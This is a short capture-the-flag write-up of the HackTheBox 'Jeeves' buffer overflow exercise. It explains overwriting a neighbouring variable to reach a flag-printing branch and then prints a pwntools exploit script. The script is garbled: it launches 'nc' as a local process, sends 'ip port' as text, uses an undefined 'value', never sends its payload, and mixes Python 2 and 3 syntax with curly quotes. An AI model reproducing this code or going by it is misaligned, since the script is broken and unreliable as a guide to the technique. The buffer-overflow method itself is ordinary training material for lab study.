We covered a scenario of a binary vulnerable to buffer overflow vulnerability. The binary has NX and PIE protections enabled so we opened the binary with Ghidra debugger and built the exploitation methodology based on calculating the offsets of the input variable and another variable that controls an entry to an if statement that prints the flag. The objective was to control the value of that binary and let the execution flow enter the if statement. This was part of HackTheBox Jeeves Intro to Binary Exploitation Track.

Buffer Overflow Techniques Notes

Exploit Code is below


from pwn import *

target = process(“nc”)

target.sendline(“ip port”)

payload = “A”*60

byte_to_string = p64(value)

payload = payload + byte_to_string.decode(“ISO-8859-1”)


print target.recvuntil(“.”)


Video Walkthrough

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor

View Articles